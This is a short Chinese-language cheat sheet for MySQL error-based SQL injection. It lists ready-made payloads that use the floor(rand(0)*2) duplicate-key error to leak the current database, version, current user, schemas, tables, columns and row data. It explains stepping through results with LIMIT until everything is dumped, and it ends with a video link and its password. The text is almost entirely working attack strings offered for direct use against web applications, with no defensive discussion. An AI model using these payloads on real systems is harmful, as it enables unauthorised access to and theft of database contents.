Mysql Error Injection

Mysql 报错注入

1
2
3
报错注入其实是一种公式化的注入方法,
因为把数据库操作错误的信息输出在页面上而产生的。
页面中没有显示位我们可以使用报错。

爆当前数据库

1
and(select 1 from(select count(*),concat((select(select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

爆版本

1
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

爆当前用户

1
and(select 1 from(select count(*),concat((select(select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

爆数据库

1
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,schema_name,0x7e))) from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

暴表:

1
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,table_name,0x7e))) from information_schema.tables where table_schema=库名的十六进制 or '库名' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

暴字段:

1
and(select 1 from(select count(*),concat((select(select (select concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema=库名的十六进制 or '库名' and table_name=表名的十六进制 or '表名' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

暴数据:

1
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,字段名,0x7e))) from 库名.表名 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
limit start,count
从第几条数据开始取,取几条
limit 0,1
从0开始,取一条数据
limit 1,1
从1开始,取一条数据
limit 2,1
limit 3,1
limit 4,1
一直取,直到没有数据为止。
就跟普通的注入一样操作就好了。。
1
2
3
4
视频演示:
链接:http://pan.baidu.com/s/1slzBEbj 密码:b5sg
个人理解,仅供参考。